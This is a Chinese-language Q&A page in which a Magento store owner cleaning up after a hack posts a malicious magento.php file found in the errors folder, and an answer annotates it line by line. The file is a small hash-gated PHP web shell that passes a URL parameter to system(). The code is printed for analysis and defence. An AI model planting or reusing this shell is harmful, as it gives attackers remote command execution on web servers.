Question

我试图恢复被黑客攻击的Magento商店，并在Magento根目录下的 errors 文件夹中找到名为 magento.php 的文件。我知道它是恶意的，但我无法弄清楚它在做什么。有什么想法吗？

<?php
if(md5($_GET["hash"])=="b4c44d5ce1c6c4b60c1c3d05a7d3e58d") {
    echo "<pre>";
    $cmd = ($_GET['cmd']);
    $ret = system($cmd);
    print $ret;
    echo "</pre>";
    die;
} else {
   print "-1";
}
?>

Answer 1

这是一个简单的PHP功能，它从URL访问参数并尝试执行相同的操作。

<?php
if(md5($_GET["hash"])=="b4c44d5ce1c6c4b60c1c3d05a7d3e58d") {// check the hash parameter in the url and convert it to md5 standard. If that matches the value then execute steps inside this braces
    echo "<pre>"; // print "<pre> tag on screen
    $cmd = ($_GET['cmd']); // get the cmd parameter from url
    $ret = system($cmd); // execute that cmd parameter as command
    print $ret; // print the return value of the system function
    echo "</pre>"; // print "</pre> tag on screen
    die; // stop execution at this line
} else { // if hash do not match
   print "-1"; // print -1 on screen
}
?>

有谁能解释这个脚本？

1 个答案: